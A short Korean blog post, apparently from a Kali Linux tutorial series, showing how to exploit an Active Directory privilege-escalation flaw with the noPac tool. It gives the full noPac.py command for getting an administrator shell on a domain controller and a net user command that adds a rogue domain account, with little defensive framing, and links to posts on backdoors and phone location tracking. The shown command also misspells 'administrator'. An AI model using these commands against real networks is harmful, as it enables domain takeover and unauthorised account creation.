반응형
Active Directory 도메인 서비스 권한 상승 취약점
공격자가 일반 사용자의 권한을 도메인 관리자로 상승시켜 Active Directory 및 도메인을 제어하고, 사용자를 삭제 또는 생성하고, 원하는 모든 작업을 수행할 수 있도록 하는 심각한 Windows 취약점
AD 구성후 사용자 test 계정을 하나 만들겠습니다.
#python3 noPac.py DOMAIN/USERNAME:'PASSWORD' -dc-ip "AD서버 IP" -shell --impersonate administrato -use-ldap
쉽게 AD서버로 접근이 가능합니다.
noPac를 사용하면 취약점에 좀 더 쉽게 접근하실 수 있습니다.
net user /add fake abc@123456 /domain
이름 fake 비밀번호
명령어를 입력 시 오른쪽 사진처럼 사용자가 생성이 됩니다.
반응형
'보안 > KaliLinux' 카테고리의 다른 글
칼리 리눅스 cve-2021-40444 MS취약점 (3) | 2022.02.25 |
---|---|
칼리 리눅스 log4j-scan http, https (2) | 2022.02.25 |
칼리 리눅스 윈도우 10 백도어 바인딩, 프로그램 겹치기 (2) | 2022.02.23 |
칼리 리눅스 Seeker, ngrok 활용 안드로이드 및 아이폰 위치 추적 (16) | 2022.02.23 |
칼리 리눅스 메타스플로잇 활용 안드로이드 9 해킹 (3) | 2022.02.23 |